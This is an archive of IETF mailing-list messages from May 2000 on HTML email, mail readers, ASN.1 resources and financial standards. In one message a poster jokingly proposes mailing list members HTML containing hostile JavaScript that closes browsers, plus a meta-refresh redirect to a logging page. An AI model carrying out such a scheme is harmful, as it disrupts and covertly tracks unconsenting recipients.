On Fri, 19 May 2000 13:51:35 +1000, Bruce Campbell <[EMAIL PROTECTED]> said:
> Just a quick survey on the last 513 messages seen in the IETF list, based
> on X-Mailer header:
> 29 exmh
OK, let's make it 30 for exmh ;)
But seriously, there's a big disparity between counting the messages *posted*
and the MUAs being used to *READ* the messages. I'm willing to bet that the
traditional posters, the professional lurkers, and the newbies are three
disjoint groups, with quite possibly different expectations regarding mail
software.
I'm willing to bet that the newbies don't know what hit them, the traditional
posters are savvy enough to deal with anything, and the complaints are
mostly coming from the lurkers....
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Fri May 19 10:30:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA05627
for [EMAIL PROTECTED]; Fri, 19 May 2000 10:30:02 -0400 (EDT)
Received: from localhost.localdomain (IDENT:root@[204.214.6.250])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA05595
for <[EMAIL PROTECTED]>; Fri, 19 May 2000 10:28:35 -0400 (EDT)
Received: from tech20 ([204.214.6.254])
by localhost.localdomain (8.9.3/8.8.7) with SMTP id KAA18877
for <[EMAIL PROTECTED]>; Fri, 19 May 2000 10:27:55 -0400
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: RE: HTML email
Date: Fri, 19 May 2000 10:28:30 -0400
Message-ID: <002001bfc19e$81e31640$[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
In-reply-to: <[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Perhaps you could clarify for us, who falls into which category?
-Scot Mc Pherson, N2UPA
-Sr. Network Analyst
-ClearAccess Communications
-Ph: 941.744.5757 ext. 210
-Fax: 941.744.0629
-mailto:[EMAIL PROTECTED]
-http://www.clearaccess.net
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Friday, May 19, 2000 10:12 AM
To: Bruce Campbell
Cc: [EMAIL PROTECTED]
Subject: Re: HTML email
On Fri, 19 May 2000 13:51:35 +1000, Bruce Campbell
<[EMAIL PROTECTED]> said:
> Just a quick survey on the last 513 messages seen in the IETF list, based
> on X-Mailer header:
> 29 exmh
OK, let's make it 30 for exmh ;)
But seriously, there's a big disparity between counting the messages
*posted*
and the MUAs being used to *READ* the messages. I'm willing to bet that the
traditional posters, the professional lurkers, and the newbies are three
disjoint groups, with quite possibly different expectations regarding mail
software.
I'm willing to bet that the newbies don't know what hit them, the
traditional
posters are savvy enough to deal with anything, and the complaints are
mostly coming from the lurkers....
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Fri May 19 11:10:43 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA06287
for [EMAIL PROTECTED]; Fri, 19 May 2000 11:10:02 -0400 (EDT)
Received: from alcove.wittsend.com (IDENT:[EMAIL PROTECTED] [130.205.0.28])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA06152
for <[EMAIL PROTECTED]>; Fri, 19 May 2000 11:02:09 -0400 (EDT)
Received: (from mhw@localhost)
by alcove.wittsend.com (8.9.3/8.9.3) id KAA09668;
Fri, 19 May 2000 10:01:39 -0400
Date: Fri, 19 May 2000 10:01:39 -0400
From: "Michael H. Warfield" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: Bruce Campbell <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: HTML email
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.1.5i
In-Reply-To: <[EMAIL PROTECTED]>; from
[EMAIL PROTECTED] on Fri, May 19, 2000 at 10:12:14AM -0400
X-Loop: [EMAIL PROTECTED]
On Fri, May 19, 2000 at 10:12:14AM -0400, [EMAIL PROTECTED] wrote:
> On Fri, 19 May 2000 13:51:35 +1000, Bruce Campbell <[EMAIL PROTECTED]> said:
> > Just a quick survey on the last 513 messages seen in the IETF list, based
> > on X-Mailer header:
> > 29 exmh
> OK, let's make it 30 for exmh ;)
> But seriously, there's a big disparity between counting the messages *posted*
> and the MUAs being used to *READ* the messages. I'm willing to bet that the
> traditional posters, the professional lurkers, and the newbies are three
> disjoint groups, with quite possibly different expectations regarding mail
> software.
Ok... So, let's try a different kind of survey. Let's try the
kind of survey that hit CyperPunks a year or so ago.
We post an html message containing some hostile java script.
I've got one that puts up a window proclaiming "HTML is inappropriate
in E-Mail" and then closes your browswer when you hit OK. I've got
another that opens TWO windows proclaiming "HTML is inappropriate in
E-Mail" each time you hit OK in one (that one is a mother to kill).
That does a quick "smoke test" survey of how many people have and html
enabled reader with javascript enabled. :-) Voting is tabulated by
counting screaming.
Round two... Someone sets up a nasty web page (with good logs) and
and then sends out an HTML message with a meta-tag refresh that bounces
the reader to the web page. Now we get a quick and automatic feedback
on how many people have html enabled readers that honor the refresh
meta-tag.
> I'm willing to bet that the newbies don't know what hit them, the traditional
> posters are savvy enough to deal with anything, and the complaints are
> mostly coming from the lurkers....
You can have lots of fun with HTML and especially have lots of
fun with people who have HTML enabled readers. Only Outlook does it
better (with everything IT currently honors).
> --
> Valdis Kletnieks
> Operating Systems Analyst
> Virginia Tech
Mike
--
Michael H. Warfield | (770) 985-6132 | [EMAIL PROTECTED]
(The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/
NIC whois: MHW9 | An optimist believes we live in the best of all
PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it!
>From owner-ietf-outbound Fri May 19 12:50:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA08118
for [EMAIL PROTECTED]; Fri, 19 May 2000 12:50:02 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA08083
for <[EMAIL PROTECTED]>; Fri, 19 May 2000 12:47:47 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id JAA17118
for [EMAIL PROTECTED]; Fri, 19 May 2000 09:47:45 -0700 (PDT)
Date: Fri, 19 May 2000 09:47:45 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Microsoft's Outlook patch
X-Loop: [EMAIL PROTECTED]
This page describes the Outlook patch in development:
http://officeupdate.microsoft.com/2000/articles/out2ksecarticle.htm
The access timer ("Provide access for {1,2,5,10...} minutes") is a
great idea. I wonder where they came up with that one. :)
However, their restriction on the Send method call leaves a lot to
be desired:
http://officeupdate.microsoft.com/2000/articles/EmailSecOM.htm
> If a program uses the Send method to send e-mail, Outlook now displays a dialog box
>asking users whether they wish
to allow the operation. Users can't choose "Yes" until five
seconds have passed.
>From owner-ietf-outbound Fri May 19 15:20:30 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA09693
for [EMAIL PROTECTED]; Fri, 19 May 2000 15:20:03 -0400 (EDT)
Received: from perq.cac.washington.edu (perq.cac.washington.edu [140.142.110.198])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA09644
for <[EMAIL PROTECTED]>; Fri, 19 May 2000 15:16:52 -0400 (EDT)
Received: from localhost (rlmorgan@localhost)
by perq.cac.washington.edu (8.9.3/8.9.3) with ESMTP id MAA11069
for <[EMAIL PROTECTED]>; Fri, 19 May 2000 12:17:10 -0700
X-Authentication-Warning: perq.cac.washington.edu: rlmorgan owned process doing -bs
Date: Fri, 19 May 2000 12:17:10 -0700 (PDT)
From: "RL 'Bob' Morgan" <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
Reply-To: "RL 'Bob' Morgan" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: HTML email
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
Sorry to prolong (and further degrade) this already overlong thread, but
somehow the one-upsmanship (or -downsmanship I suppose) about who has the
most primitive email environment reminded of the venerable item below. My
only excuse is that it's a Friday in May ...
- RL "Bob" (proud Pine user, of course)
---
WARNING: Nerd humor follows
>From: [EMAIL PROTECTED] (GUNNAR HORRIGMO)
>Subject: Re: Help with XMS mailer on my Game-Boy?
>Date: Sun, 8 Nov 1992 18:53:02 GMT
>[EMAIL PROTECTED] (Randy Wong) writes:
>>[EMAIL PROTECTED] (Daniel M Silevitch) writes:
>>>[EMAIL PROTECTED] (Steven Marcotte) writes:
>>>>[EMAIL PROTECTED] (Babak Gohari) writes:
>>>>>[EMAIL PROTECTED] (Tilden-Master of Illogic) writes:
>>>>>>[EMAIL PROTECTED] (David Lutz) writes:
>>>>>>>[EMAIL PROTECTED] (Daniel M Silevitch) writes:
>>>>>>>>[EMAIL PROTECTED] (Brat Wizard) writes:
>>>>>>>>>[EMAIL PROTECTED] writes:
>>>>>>>>>>Michael Schmahl [Black-Robe Mage] writes:
>>>>>>>>>>>[EMAIL PROTECTED] writes
>>>>>>>>>>>>22161-bunz writes:
>>>>>>>>>>>>>Brett G Person writes:
>>>>>>>>>>>>>>[EMAIL PROTECTED] writes:
>>>>>>>>>>>>>>>IronEagle writes:
>>>>>>>>>>>>>>>>Matt Welsh writes:
>>>>>>>>>>>>>>>>>Right! I run System V on my VIC-20!
>>>>>>>>>>>>>>>>Hmmmm...well, I am getting SVR4 for my HP 48SX.....
>>>>>>>>>>>>>>>HA! _I'm_ just finishing up a port of VMS for my Timex Sinclair!
>>>>>>>>>>>>>>>Top THAT!
>>>>>>>>>>>>>>I'm running NextStep on Atari 2600 Video Game System.
>>>>>>>>>>>>>Just last night I was able to get Windows to boot on my Sears PONG
>>>>>>>>>>>>>game.
>>>>>>>>>>>>I am replying to this message with my built-in VAX Mailer on my
>>>>>>>>>>>>Game-Boy.
>>>>>>>>>>>>I just installed a 10 Gigabyte Drive to handle all the replies!
>>>>>>>>>>>>However, it only runs at 230,000 Baud due to the large drive
>>>>>>>>>>>>slowing it down.
>>>>>>>>>>>I fear I will not be getting news any longer... The batteries on my
>>>>>>>>>>>calculator-watch are running out.
>>>>>>>>>>My calculator-watch is solar... And if I turned off the lights, NO
>>>>>>>>>>ONE would be getting news...
>>>>>>>>>Feh. I'm so slick NASA just awarded ME the TERADATA contract to run on
>>>>>>>>>my TV remote! They liked my proposal mainly because I'm ALSO able to
>>>>>>>>>shoehorn in the TEXAS SUPERCOLLIDER computations between commercials!
>>>>>>>>>Beat THAT!
>>>>>>>>Well, well, well. SSC calculations, huh. I built a system out of 2
>>>>>>>>inches of wire, 3 pennies and a AA battery that does realtime
>>>>>>>>calculations of particle vectors during the Big Bang. A complete
>>>>>>>>simulation of the first 2 years of the life of the universe, accurate
>>>>>>>>to the theoretical limit, takes about 5 seconds.
>>>>>>>And you guys think you are so great. I just spent the last half hour
>>>>>>>getting X11 to run on my slide rule. I am still having problems
>>>>>>>connecting it to the net around here, but I would welcome any
>>>>>>>suggestions.
>>>>>>So what!!! I'm running Xinitrc, TWMRC, Internet, and 27 muds off of a
>>>>>>paperclip. Not to mention the fact that I am designing a new form of
>>>>>>television with 7000 pixels based off a piece of tissue paper. Next!!!
>>>>>Man, that's baby stuff. I'm running a particle accelerator utilizing
>>>>>matter-antimatter reactions in my doorknob, and calculating everything in
>>>>>the fourth dimension using a single dip switch and a large glass of water.
>>>>Child's play, I have an old piece of cheese that is, at this very moment,
>>>>raytracing an actual model of the universe five hours from now, while
>>>>at the same time calculating the heat produced from the new intel
>>>>Pentium.
>>>And you people think that you are hackers! I'm currently engaged in a
>>>project which involves simultaneous simulation of multiple universes (To
>>>see what would happen if various constants change. Pi=8.4 is an interest-
>>>ing one.) My hardware consists of a single wooden pencil (no paper). With
>>>it, I can do real-time simulations of 2^32 universes in parallel.
>>You guys are wimps!! I've just finished converting a microwave oven into a
>>paradimensional teleportation device. The only problem I'm having so far is
>>that my breakfast bagel keeps disappearing!! May have to eat it raw . . .
>Sorry, that's my fault. I'm afraid that the high-energy laser-pumped
>negentropic vortex generator I made from my own nostril hair, which is
>currently cranking out entire new universes at the rate of 7.6 per picosecond,
>was breaking the FCC emissions limits and gronking your microwave's control
>panel. It should work properly now. Also, my cat Arthur was FTPing hundreds
>of terabytes of PD software from Epsilon Eridani in the year 4741 A.D. over
>the faster-than-light Ethernet interface I built for him, and this may have
>been loading the Net a little yesterday. My sincere apologies to everyone who
>noticed any performance degradation.
Damn, I thought I was doin' some really advanced R&D. But I only have a
humble feather pen with built in spell checking. It checks all languages
since Adam & Eve plus a few forthcoming languages. But after what I've seen
here, that's not good enough for a Nobel Prize..I have to work harder...
Maybe some of the languages from outer space will help ?? I just have to
use my FingerNail Time&Universe Transporter(tm) to get there and learn them.
>From owner-ietf-outbound Fri May 19 15:30:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA09847
for [EMAIL PROTECTED]; Fri, 19 May 2000 15:30:03 -0400 (EDT)
Received: from mail0.sibs.pt (mail0.sibs.pt [195.138.0.101])
by ietf.org (8.9.1a/8.9.1a) with SMTP id PAA09820
for <[EMAIL PROTECTED]>; Fri, 19 May 2000 15:26:29 -0400 (EDT)
Received: (qmail 31923 invoked from network); 19 May 2000 19:21:25 -0000
Received: from unknown (HELO sibs.pt) (195.138.0.90)
by mail0.sibs.pt with SMTP; 19 May 2000 19:21:25 -0000
Message-ID: <[EMAIL PROTECTED]>
Date: Fri, 19 May 2000 20:31:09 +0100
From: Bruno Salgueiro <[EMAIL PROTECTED]>
Organization: SIBS
X-Mailer: Mozilla 4.72 [en] (WinNT; U)
X-Accept-Language: pt,en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: [off-topic] ASN.1 links
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1;
boundary="------------ms7642A62BB9BF77746F9DB6E5"
X-Loop: [EMAIL PROTECTED]
This is a cryptographically signed message in MIME format.
--------------ms7642A62BB9BF77746F9DB6E5
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Dear all,
First of all sorry for this post but I'd like to know where are any
good links around about ASN.1. This is of course important so that the
ASN.1 structures used in the RFCs and drafts can be well understood and
implemented.
I could always download the specification from ITU but I'd like a more
practical approach.
Best regards and have a nice weekend.
--
=======================================================
Bruno Salgueiro (mailto:[EMAIL PROTECTED])
SIBS - Sociedade Interbancária de Serviços
Rua Soeiro Pereira Gomes, Lote 1, 1600 Lisboa, Portugal
Tel: + 351 21 791 88 33
Fax: + 351 21 794 24 40
http://www.sibs.pt
Esta mensagem foi assinada com certificado MULTIcert.
Para obter o certificado da Autoridade de Certificação
PILOTO MULTIcert dirija-se ao site
http://www.sibs.multicert.com
"Computers are useless. They can only give you answers."
--Pablo Picasso
=======================================================
--------------ms7642A62BB9BF77746F9DB6E5
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
Content-Transfer-Encoding: base64
MIIFCwYJKoZIhvcNAQcCoIIE/DCCBPgCAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC
A4owggOGMIIC76ADAgECAgQ3Ttp2MA0GCSqGSIb3DQEBBQUAMCgxCzAJBgNVBAYTAlBUMRkw
FwYDVQQKExBQSUxPVE8gTVVMVEljZXJ0MB4XDTk5MDUzMTIzMzIzNFoXDTAwMDYwMTAwMDIz
NFowYTELMAkGA1UEBhMCUFQxGTAXBgNVBAoTEFBJTE9UTyBNVUxUSWNlcnQxDTALBgNVBAsT
BFNJQlMxDjAMBgNVBAsTBURTSVNUMRgwFgYDVQQDEw9CcnVubyBTYWxndWVpcm8wXDANBgkq
hkiG9w0BAQEFAANLADBIAkEAuVICquW4IcbOpM37DdyglXYa8AAdR6UWq2VFEFTUtY0colnZ
a9BQ0DvTRB8sO5XuFiTWFnVR5T94R5j5PjE0cwIDAQABo4IBxjCCAcIwCwYDVR0PBAQDAgWg
MCsGA1UdEAQkMCKADzE5OTkwNjAxMDAwMjM0WoEPMjAwMDAyMTIwNDAyMzRaMBEGCWCGSAGG
+EIBAQQEAwIFoDCBqQYJYIZIAYb4QgENBIGbFoGYQ2VydGlmaWNhZG8gUElMT1RPIE1VTFRJ
Y2VydC4gRXN0ZXMgY2VydGlmaWNhZG9zIHNhbyBlbWl0aWRvcyBhbyBhYnJpZ28gZG8gQ1BT
IHF1ZSBzZSBlbmNvbnRyYSBubyBzZWd1aW50ZSBVUkwgLSBodHRwczovL3d3dy5zaWJzLm11
bHRpY2VydC5jb20vY3BzLmh0bWwwFQYDVR0RBA4wDIEKYnNAc2licy5wdDBKBgNVHR8EQzBB
MD+gPaA7pDkwNzELMAkGA1UEBhMCUFQxGTAXBgNVBAoTEFBJTE9UTyBNVUxUSWNlcnQxDTAL
BgNVBAMTBENSTDEwHwYDVR0jBBgwFoAUuJYgbdZN8aJJDF13gU9LJAiiL+UwHQYDVR0OBBYE
FEsyR+XzLWwX2+4LDk6/lA+XyaZtMAkGA1UdEwQCMAAwGQYJKoZIhvZ9B0EABAwwChsEVjQu
MAMCA6gwDQYJKoZIhvcNAQEFBQADgYEAk1GfA3Mtu3ECWCz2SIxkVisgOxt9vDKdQNTevrus
an91qvmvoHAtJMAlAolegoiDpq73qdk+9JMODICE5zEXDIK9w2nCkqBheFwJs7frm/tVLnSv
H+vQ5/5EX3ARwqforMGtjf+BO8OuYoxRyydKx9xheeyhke9+xJCEnOA2wDwxggFJMIIBRQIB
ATAwMCgxCzAJBgNVBAYTAlBUMRkwFwYDVQQKExBQSUxPVE8gTVVMVEljZXJ0AgQ3Ttp2MAkG
BSsOAwIaBQCggbEwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0BCQUxDxcN
MDAwNTE5MTkzMTA5WjAjBgkqhkiG9w0BCQQxFgQUn7h/hTdCBZt/C4qwPxr1LPixPQ4wUgYJ
KoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwBwYFKw4DAgcwDQYI
KoZIhvcNAwICAUAwDQYIKoZIhvcNAwICASgwDQYJKoZIhvcNAQEBBQAEQIZpNdE82ZlOrZuq
BHVsk3PsIgm9gTCbTLYKHoogfoT5xcJme8YcYLisiFl194ziwGwQh4Q4kSzZzcfF0TcBRxk=
--------------ms7642A62BB9BF77746F9DB6E5--
>From owner-ietf-outbound Fri May 19 16:10:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA10447
for [EMAIL PROTECTED]; Fri, 19 May 2000 16:10:02 -0400 (EDT)
Received: from infidel.boolean.net ([EMAIL PROTECTED] [198.144.206.49])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA10364
for <[EMAIL PROTECTED]>; Fri, 19 May 2000 16:03:49 -0400 (EDT)
Received: from gypsy (gypsy.boolean.net [198.144.202.243])
by infidel.boolean.net (8.9.3/8.9.3) with SMTP id UAA00852;
Fri, 19 May 2000 20:03:42 GMT
(envelope-from [EMAIL PROTECTED])
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Fri, 19 May 2000 13:03:41 -0700
To: Bruno Salgueiro <[EMAIL PROTECTED]>
From: "Kurt D. Zeilenga" <[EMAIL PROTECTED]>
Subject: Re: [off-topic] ASN.1 links
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id QAA10364
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
You might also checkout these resources:
http://www-sop.inria.fr/rodeo/personnel/hoschka/asn1.html
http://asn1.elibel.tm.fr/
http://www.cs.columbia.edu/~hgs/internet/asn.1.html
Also,
"A Layman's Guide to ASN.1, BER, and DER" is available from RSA Security.
ftp://ftp.rsasecurity.com/pub/pkcs/ascii/layman.asc (ASCII)
ftp://ftp.rsasecurity.com/pub/pkcs/ps/layman.ps (PostScript)
Peter Gutmann's X.509 Style Guide:
"There seems to be a lot of confusion about how to implement
and work with X.509 certificates, either because of ASN.1
encoding issues, or because vagueness in the relevant standards
means people end up taking guesses at what some of the fields
are supposed to look like. For this reason I've put together
these guidelines to help in creating software to work with X.509
certificates, PKCS #10 certification requests, CRL's, and other
ASN.1-encoded data types."
http://www.cs.auckland.ac.nz/~pgut001/pubs/x509guide.txt
At 08:31 PM 5/19/00 +0100, Bruno Salgueiro wrote:
>Dear all,
>
> First of all sorry for this post but I'd like to know where are any
>good links around about ASN.1. This is of course important so that the
>ASN.1 structures used in the RFCs and drafts can be well understood and
>implemented.
> I could always download the specification from ITU but I'd like a more
>practical approach.
>
>Best regards and have a nice weekend.
>--
>=======================================================
>Bruno Salgueiro (mailto:[EMAIL PROTECTED])
>
>SIBS - Sociedade Interbancária de Serviços
>Rua Soeiro Pereira Gomes, Lote 1, 1600 Lisboa, Portugal
>
>Tel: + 351 21 791 88 33
>Fax: + 351 21 794 24 40
>http://www.sibs.pt
>
>Esta mensagem foi assinada com certificado MULTIcert.
>Para obter o certificado da Autoridade de Certificação
>PILOTO MULTIcert dirija-se ao site
> http://www.sibs.multicert.com
>
>"Computers are useless. They can only give you answers."
> --Pablo Picasso
>=======================================================
>Attachment Converted: "c:\home\kurt\data files\eudora\attach\smime.p7s"
>
>From owner-ietf-outbound Fri May 19 16:40:16 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA10772
for [EMAIL PROTECTED]; Fri, 19 May 2000 16:40:03 -0400 (EDT)
Received: from tsx-prime.MIT.EDU (TSX-PRIME.MIT.EDU [18.86.0.76])
by ietf.org (8.9.1a/8.9.1a) with SMTP id QAA10724
for <[EMAIL PROTECTED]>; Fri, 19 May 2000 16:35:58 -0400 (EDT)
Received: by tsx-prime.MIT.EDU
with sendmail-SMI-8.6/1.2, id QAA05136; Fri, 19 May 2000 16:35:58 -0400
Date: Fri, 19 May 2000 16:35:58 -0400
Message-Id: <[EMAIL PROTECTED]>
From: "Theodore Y. Ts'o" <[EMAIL PROTECTED]>
To: Tim Salo <[EMAIL PROTECTED]>
CC: [EMAIL PROTECTED]
In-reply-to: Tim Salo's message of Thu, 18 May 2000 23:54:01 -0500 (CDT),
<[EMAIL PROTECTED]>
Subject: Re: HTML email
Phone: (781) 391-3464
X-Loop: [EMAIL PROTECTED]
Date: Thu, 18 May 2000 23:54:01 -0500 (CDT)
From: Tim Salo <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
> Date: Fri, 19 May 2000 13:51:35 +1000 (EST)
> From: Bruce Campbell <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: Re: HTML email
> [...]
> tytso> I wonder how many people are still using plain-text,
> tytso> non-HTML enabled mail readers? ...
>
> Just a quick survey on the last 513 messages seen in the IETF list, based
> on X-Mailer header:
If I count correctly, your list contains 284 samples. I suspect that
a good number of the remaining 229 mail messages were created by older
mailers that don't generate an X-Mailer header.
.... and it's likely that most of the 229 mail messages created by
"older mailers" don't deal with HTML, and possibly not with MIME,
either.
- Ted
(who is still using emacs RMAIL
to read his mail)
>From owner-ietf-outbound Sat May 20 22:15:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id WAA03406
for [EMAIL PROTECTED]; Sat, 20 May 2000 22:10:02 -0400 (EDT)
Received: from sdp.ee.tsinghua.edu.cn ([166.111.64.222])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id WAA03379
for <[EMAIL PROTECTED]>; Sat, 20 May 2000 22:03:05 -0400 (EDT)
Received: from Zhengyq ([166.111.64.236]) by sdp.ee.tsinghua.edu.cn
(Netscape Mail Server v2.02) with SMTP id AAA192
for <[EMAIL PROTECTED]>; Sun, 21 May 2000 10:16:50 +0800
Message-ID: <001a01bfc2c8$c8ddf3a0$ec406fa6@Zhengyq>
From: [EMAIL PROTECTED] (Zheng Youquan)
To: "ietf.org" <[EMAIL PROTECTED]>
Subject: who can tell me the email address of Scott Shenker ???
Date: Sun, 21 May 2000 10:03:40 +0800
MIME-Version: 1.0
Content-Type: text/plain;
charset="gb2312"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.3825.400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.3825.400
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from base64 to 8bit by ietf.org id WAA03379
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
I want to ask him some questions.
thank you very much!
>From owner-ietf-outbound Sat May 20 23:01:23 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA04560
for [EMAIL PROTECTED]; Sat, 20 May 2000 23:00:02 -0400 (EDT)
Received: from sdp.ee.tsinghua.edu.cn (sdp.ee.tsinghua.edu.cn [166.111.64.222])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id WAA04522
for <[EMAIL PROTECTED]>; Sat, 20 May 2000 22:52:11 -0400 (EDT)
Received: from Zhengyq ([166.111.64.236]) by sdp.ee.tsinghua.edu.cn
(Netscape Mail Server v2.02) with SMTP id AAA159
for <[EMAIL PROTECTED]>; Sun, 21 May 2000 11:06:00 +0800
Message-ID: <003801bfc2cf$a6ac6d00$ec406fa6@Zhengyq>
From: [EMAIL PROTECTED] (Zheng Youquan)
To: "ietf.org" <[EMAIL PROTECTED]>
Subject: who can tell me the email address of Scott Shenker ???
Date: Sun, 21 May 2000 10:52:49 +0800
MIME-Version: 1.0
Content-Type: text/plain;
charset="gb2312"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.3825.400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.3825.400
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from base64 to 8bit by ietf.org id WAA04522
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
I want to ask him several questions.
Thank you very much!
>From owner-ietf-outbound Sun May 21 02:41:41 2000
Received: by ietf.org (8.9.1a/8.9.1a) id CAA17640
for [EMAIL PROTECTED]; Sun, 21 May 2000 02:40:04 -0400 (EDT)
Received: from winery.garlic.com (winery-en0b.garlic.com [216.139.31.163])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id CAA17593
for <[EMAIL PROTECTED]>; Sun, 21 May 2000 02:32:17 -0400 (EDT)
Received: from lynnpc (lynn-17.garlic.com [208.195.167.17])
by winery.garlic.com (8.10.0/8.10.0) with ESMTP id e4L6TSR39922;
Sat, 20 May 2000 23:29:33 -0700
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED] (Unverified)
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2
Date: Sat, 20 May 2000 23:28:06 -0700
To: Musandu <[EMAIL PROTECTED]>
From: Anne & Lynn Wheeler <[EMAIL PROTECTED]>
Subject: re: Financial Stnadards Work group?
Cc: Anne & Lynn Wheeler <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
X9.59 is a financial industry standard for all account-based electronic
retail transactions.
In the AADS strawman chip scenerio for X9.59 ... whether debit, credit,
prepaid, etc. , the chip would sign a X9.59 transaction and work identical
whether it was at person's PC or at point-of-sale (it works the same
whether any ietf internet infrastructure is involved or existing financial
network infrastructure)
Such an AADS strawman chip scenerio for X9.59 would work the same
regardless of internet, no-internet, point-of-sale, debit, credit,
pre-paid, bank, subscriber, isp. (the AADS strawman chip scenerio also
works the same for non-X9.59 AADS scenerios like AADS radius, ISP
authenticated access, webserver authenticated access, VPN authentication
operation, etc).
There are some issues for the AADS strawman chip scnerio for X9.59, like
contact or contactless. Contact would be standard existing chipcard
standard and would be useable in existing chipcard contact readers. The
contactless standards are less well accepted ... but establishing a
contactless accepted standard would free up the AADS strawman chip to
become form-factor agnostic (i.e. an AADS strawman chip could imbedded into
almost any shape and be able to operate).
The AADS chip strawman scenerio for X9.59 not only proposes that it is the
same regardless of whether it is Internet or non-internet, but also whether
it is credit, debit, pre-paid, authenticated access, existing financial
infrastructure, point-of-sale, who the bank is, face-to-face physical, who
the service provider is, as well as what country that it might operate in
At 08:06 AM 5/16/2000 +0300, Musandu wrote:
>I do not quiet agree with the current standards, they are a pain in the
>neck. E.g ( Just one example ) I want the internet debit card and the
>devices for charging them to be standard hardware available in any computer
>store. This will allow one to chose any bank or service provider ( instead
>of your money going proprietory ): imagine buying a new modem or router
>every time you change ISPs or buying different kinds of printers for
>printing from different web sites. That is the position of debit card
>recharging buying a new device each time you change the service provider.
>The IETF can help or do you hold alternative views ( give me some
>recharging devices that allow change overs )??
>
>Yours sincerely,
>Nyagudi Musandu
>
>At 10:28 14/05/00 -0700, you wrote:
> >Musandu <[EMAIL PROTECTED]> writes:
> >
> > >It may just be time for the IETF to develop a financial standards
> > >work group separate from the applications work group. I can even >forsee
> >a Simple Cash Transfer Protocol? any objections?
> >
